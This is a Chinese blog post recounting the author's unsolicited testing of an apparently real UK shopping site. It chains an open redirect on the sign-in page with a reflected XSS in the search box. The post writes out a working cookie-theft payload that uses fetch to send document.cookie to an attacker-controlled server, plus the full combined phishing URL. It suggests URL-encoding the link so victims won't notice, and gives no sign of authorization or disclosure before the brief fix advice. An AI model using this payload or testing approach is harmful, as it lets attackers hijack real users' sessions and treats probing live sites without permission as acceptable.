我的第一次真实对国外某购物平台web漏洞挖掘

已于 2023-01-24 13:35:15 修改
阅读量1.4w 收藏 62
点赞数 30
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: web安全 常见web漏洞 xss web漏洞挖掘 开放重定向
于 2023-01-24 01:23:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128754634
版权

(真实世界)我的第一次真实对国外某购物平台web漏洞挖掘

  • 开放重定向 - 低危
  • XSS - 低危

这两组合起来就完全不一样一点的,个人觉得比原本高一些

危害:窃取用户敏感数据、用户cookie、钓鱼操作 等…

前言

这是我第一次,真实世界的web漏洞挖掘(开发重定向 + xss)

虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单
虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单
虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单

这次漏洞挖掘是无意的,这是我在做题的时候,题目需要我进行信息收集,我收集到相关的一个网站,于是在这个网站多看了几眼,发现了漏洞

首先我打开这个网站的第一件事,也是最简单的:查看源代码

在这里插入图片描述

源代码:

在这里插入图片描述

在源代码中发现这一个url

url参数重定向 - OpenRedirect

分析:

/sign-in?redirect=

这里我测试过,因为这里是用户登录页面

  • 如果用户未登录,则在用户登录成功后,重定向到redirect参数指定的url
  • 如果用户已登录,则直接跳转到redirect参数指定的url

当我尝试修改redirect参数,改成百度:

在这里插入图片描述

在已登录状态下,确实重定向到百度去了

open redirect的好兄弟

我们都知道,单单一个开放重定向通常情况下危害不大,甚至可以忽略不计,没啥用

但是可以搭配其他漏洞来做一套组合拳,这个漏洞就是xss.

通过开放重定向漏洞将受害者重定向到被攻击者控制的具有xss漏洞的页面上,执行恶意js代码

通过这套开放重定向 + xss

攻击者很容易获得一些信息,如:

  • 用户的cookie
  • 攻击者期望的操作,例如:下单、修改账户等相关操作
  • 社会工程 - 攻击者利用xss构建恶意代码,攻击者诱导受害者填写隐私信息以获取攻击者想要获取的受害者的信息

等等等等

所以现在我们的当务之急应该寻找xss漏洞,打一套组合拳

XSS - 反射型

果不其然,经过tryhackme的训练,我一下子就找到了

就在网站主页的搜索功能

一开始尝试sql注入,但是无果

但是第二次尝试寻找漏洞的时候,我发现输入的内容会拼接到回显页面中,于是开始尝试xss

在这里插入图片描述

它直接镶嵌到span标签中

我直接绕出去了,毫无难度,成功找到反射xss漏洞

XSS + OpenRedirect - 组合拳

兔年万事如意,心想事成

现在我们可以尝试简单的利用xss+开放重定向获取用户的cookie

构造XSS Payload:

https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

注意:这里的fetch函数中的url不能携带有http://或https://,否则会失败,所以使用//

最好不要有空格,因为此payload稍后将会放到url参数中

我们可以直接验证此payload是否有效:

在这里插入图片描述

可以看到它携带着cookie去请求攻击者托管的http服务器去了!

在这里插入图片描述

现在让我们将xss和开放重定向组合起来:

实现让用户点击我们的精心设计过的登录url,即可窃取该用户的cookie等

如果通过钓鱼等方式令网站管理员点击此恶意链接会发生什么事?

我很难想象,毕竟这个平台有些地方甚至没有csrf防护,也别忘了我们还有xss

回归正题

首先,随便注册个账户并登录

在这里插入图片描述

XSS Payload:

https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

OpenRedirect Payload:

https://www.nonno.co.uk/sign-in?redirect=https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

解析:当已登录用户点击此OpenRedirect payload的url,将重定向到xss漏洞处并执行我们指定的恶意js代码,这里的js代码使用fetch发送请求到我们攻击者的http服务器并附带cookie

在这里插入图片描述

至此漏洞利用完成,攻击者将获取受害者的cookie,甚至其他任何操作!

只要适当的将payload进行urlencode,受害者可能根本无法判断!

更进一步的利用:OpenRedirect + XSS,再加csrf等等等等,危害还能在提升

漏洞修补建议

OpenRedirect

  • 不要使用url参数(GET or POST)来进行重定向,即便使用,也要做好防护,避免idor
  • 完善各个功能的csrf防护

XSS

  • 做好用户输入检测,检测到黑名单字符直接禁止访问
  • 过滤特殊字符

结束

事实上我这里只找了两个漏洞,很难猜测其他地方是否还存在其他漏洞。

希望平台管理方认真做好安全防护

这也是我的第一次真实的web漏洞挖掘,我非常的激动,这是一次无意的漏洞挖掘,真的是无意的

不说了,跑路了

Sugobet
关注
  • 30
    点赞
  • 62
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 11
    评论
专栏目录
web安全&漏洞挖掘.zip(中文)
10-15
ppt漏洞挖掘思想,浅谈Web业务&应用逻辑缺陷,我的Web应用安全模糊测试之路,WEB安全-兵器剖析,WEB安全漏洞攻防-基础。WEB安全入门基础,WEB安全-杂类知识
web漏洞挖掘快速入门.pdf
03-21
web漏洞挖掘快速入门,涵盖完整的漏洞挖掘流程,从前期的信息搜集一直到后渗透测试,是新手入门挖洞的理想指南。
WEB常见漏洞与挖掘技巧研究.ppt
06-20
WEB常见漏洞与挖掘技巧研究
基于python的web漏洞挖掘技术的研究(django).zip
07-06
基于python的web漏洞挖掘技术的研究(django) 关键词:Web漏洞挖掘;python;django;mysql; 本次技术通过利用Python技术来开发一款针对web漏洞挖掘扫描的技术,通过web漏洞的挖掘扫描来实现对网站URL的漏洞检测,通过高中低风险的判断来实现对一款网站中存在的漏洞进行可视化的分析,从而能够找到问题并且尽快的实现问题的解决。 漏洞扫描系统 (1)通过上图可以看出此次的系统设计需要通过三大部分来实现有效的功能设计实现,分别为爬虫、漏洞探测、SQL注入,通过这三个步骤之后在网页端形成报告的生成。 (2)爬虫模块是以主题爬虫为最为基础的内容设计,通过对URL的相关数据爬取来实现有效的信息的下载获取; (3)缺陷探测过程中,通过对正常的URL、带有缺陷的URL等进行检测,将检测出的内容存储在数据库汇总。 (4)通过SQL注入来进行数据库的SQL语句的内容测试。
web漏洞挖掘思维导图
12-21
适合想学习web知识的人
Taie-Bugbounty-killer:挖掘国内外漏洞平台必备的自动化捡钱赏金技巧,看了并去做了捡钱如喝水
04-12
:crown: Taie-Bugbounty-killer是什么意思? :crown: 主要目标是分享一些更快速的刷SRC赏金的自动化挖洞技巧命令和工具协同。使用里面的方法,我们能够快速批量找到可以被利用的子域、api令牌和其它敏感漏洞。 摘要 之前许诺给大家的自动化赏金挖洞技巧,现在来了,我不知道你们现在的挖洞方式是什么?我现在的挖洞方式是能用老外的一条命令自动化或者整合自动化我就不手动挨个去信息收集可以挖掘。希望这个系列可以给你们提供一些不一样的挖洞思路技巧。目前一共100条自动化技巧后面会持续更新自动化技巧,只要你自己真的去执行去做,不可能挖不到洞。一个月捡个几百几千饭钱还是可以的。单条技巧不能最大化发挥威力,根据你自己的漏洞挖掘思想去组装合体让他变强! 如何成为赏金猎人 下面就给大家介绍一下如何成为一名赏金猎人,以及在做赏金猎人悬赏时需要注意的事项。 睡个好觉 学习漏洞类型(owasp) 每次专注于一件事
很多博客都存在的跨站漏洞
INFO TECH
04-29 920
转自 啊D的博客  此漏洞在 search.asp 模块过滤不严造成的!测试的内容这次是输入 之后按“查找”将会发现,百度给套到网页里了! 呵,这表明跨站是成功的!还试了两个朋友的站1。2。其实这个漏洞很早就人发现的,但好像没人理会!但有意的伪造,利用还是不小的!http://www.xxxx.net/search.asp?SearchContent=&searchType=title改成http
网站漏洞挖掘思路
xnxqwzy的博客
10-12 534
未授权访问漏洞,是在攻击者没有获取到登录权限或未授权的情况下,不需要输入密码,即可通过输入网站控制台主页面地址或者不允许查看的连接便可进行访问,同时进行操作。
应用安全系列之三十:任意重定向
jimmyleeee的专栏
04-12 1737
任意重定向,英文是Open Redirect,主要意思就是在Web应用程序进行跳转时,没有控制重定向的目标,导致可以跳转到任意一个网站。重定向在包括站forward和redirect两种,也就是转发和重定向。转发一般都用于站内的页面之间的跳转,用的都是没有站点的路径信息,而重定向一般都会使用URL跳转,可以站内,也可以站外。 重定向的方法有多种,在有META标签内跳转、javascript跳转以及header头跳转,这些跳转一般都比较难易用来攻击。另外一种常用的跳转方法是在...
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
Linux平台上一种web漏洞灰盒测试方法.pdf
08-07
这个议题由白帽子对Perl的Bash命令执行漏洞的分析所引起,因为在追踪的过程一直未能复现漏洞,所以采取了一个有趣的技术手段进行监控调试,最终发现了“元字符”对漏洞的关键影响,并且摸清了Perl命令执行的条条道道 温习功课 PPT下载 来源
【推荐】网络安全中的漏洞挖掘实践合集.zip
09-03
推荐,网络安全中的漏洞挖掘实践合集,仅供大家学习参阅,包含内容如下: 针对现实应用的文本对抗攻击研究 安全众测下的漏洞发展新趋势 安卓应用漏洞挖掘 从0到1-发现与拓展攻击面 对基于Git的版本控制服务的通用攻击面的探索 对民用飞行控制系统固件的逆向与漏洞分析 卫星通信的安全缺陷 基于全流量的智慧漏洞挖掘 基于运行时类型嗅探技术提高模糊测试的漏洞发掘效果 漏洞挖掘进化论-推开xray之门 逆向在漏洞挖掘中的应用 苹果攻击面和漏洞挖掘自动化研究 如何从高赏金项目中拿到高危 如何去挖掘物联网环境中的高级恶意软件威胁 如何在3个月发现 12 个内核信息泄露漏洞 沙箱内持久化.行之有效的沙箱攻击新思路 深度解析Weblogic_XMLDecoder反序列化 使用数据流敏感模糊测试发现漏洞 锁不住的安全 谈谈工业协议转换器的一些问题 逃逸IE浏览器沙箱-在野0Day漏洞利用复现 为何自动化漏洞挖掘如此困难 现代可抵赖后门研究 一扇虚掩的大门-现代智能系统的重要攻击面 源代码漏洞挖掘 远程root现代安卓设备 在现代Windows内核中发现存在20年的漏洞 针对智能设备漏洞挖掘的一些新方法 AI用于软件漏洞挖掘 AndroidWebView安全攻防指南2020 Java反序列化漏洞自动挖掘方法 macOS从运行库劫持到内核提权 MTK安全启动大剖析.CIS大会分论 MyBatis框架下SQL注入解决方案 Qemu-kvm和ESXi虚拟机逃逸实例分享 WEB常见漏洞与挖掘技巧研究 Web漏洞挖掘速成特训营 混合式漏洞挖掘研究进展
web漏洞挖掘经验.pdf
12-12
web漏洞挖掘经验.pdf
网络安全(黑客技术)—2024自学手册
Dasdwer的博客
04-17 1002
很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习导航三大章节,涉及价值观、方法论、执行力、行业分类、职位解读、法律法规政策、国家政府机构、安全企业、安全媒体、安全工具、安全标准、书籍教材、视频教程、学习路线、面试题、靶场、SRC、CTF 等 20+ 细分专题。(文末有福利~)
网络安全之反弹Shell
小飞的博客
04-12 1436
在网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
智能驾驶+网络安全
最新发布
SAAS666的博客
04-24 121
智能驾驶场景下,安全问题相关的讨论是一个持续热点;关于车机模块如何不会被黑客利用Linux的漏洞攻击?不会被APP应用截获?OTA 服务器如何保护?这三个核心场景的安全风险均不同忽视。本篇文章从有人驾驶(家庭用车)和无人驾驶(公共交通、封闭园区车辆)两个维护,讨论以上三个核心场景的安全风险问题。
蓝桥杯-网络安全-练习题-crypto-rsa
weixin_49765221的博客
04-24 327
蓝桥杯抱佛脚吧
web漏洞挖掘 实战
08-29
Web漏洞挖掘是一项重要的安全工作,可以帮助发现和修复Web应用程序中存在的潜在漏洞。以下是一些实战中常用的Web漏洞挖掘方法: 1. 信息收集:收集关于目标应用程序的信息,包括架构、技术栈、可用端点等。 2. 扫描和映射:使用自动化工具(如Burp Suite、Nessus)扫描目标应用程序,识别潜在的漏洞点,并进行应用程序映射。 3. 注入攻击:通过输入恶意数据,检查应用程序是否容易受到SQL注入、命令注入或其他注入类攻击。 4. 跨站脚本攻击(XSS):尝试在用户输入点或其他可注入脚本的位置插入恶意脚本,以执行未经授权的操作。 5. 跨站请求伪造(CSRF):检查应用程序是否存在缺乏适当身份验证和授权机制,以防止来自恶意网站的伪造请求。 6. 文件包含漏洞:检查应用程序是否存在可用于包含远程文件的漏洞,从而可能导致代码执行或敏感信息泄露。 7. 不安全的直接对象引用(IDOR):尝试直接访问应用程序中的资源,绕过身份验证和授权检查,查看是否存在未受保护的敏感信息。 8. 服务器配置错误:检查目标服务器的配置文件,查看是否存在敏感信息泄露、目录列表、不安全的HTTP方法等问题。 9. 逻辑漏洞:检查应用程序的业务逻辑,寻找可能导致未经授权的访问或敏感信息泄露的逻辑错误。 10. 漏洞利用和验证:对发现的漏洞进行进一步测试和验证,并编写详细的报告,以便开发人员能够修复这些漏洞。 请注意,进行Web漏洞挖掘需要合法授权和合规性,任何未经授权的活动都是违法的。建议在进行漏洞挖掘之前,与相关业主或法定所有者协商和获得明确的许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值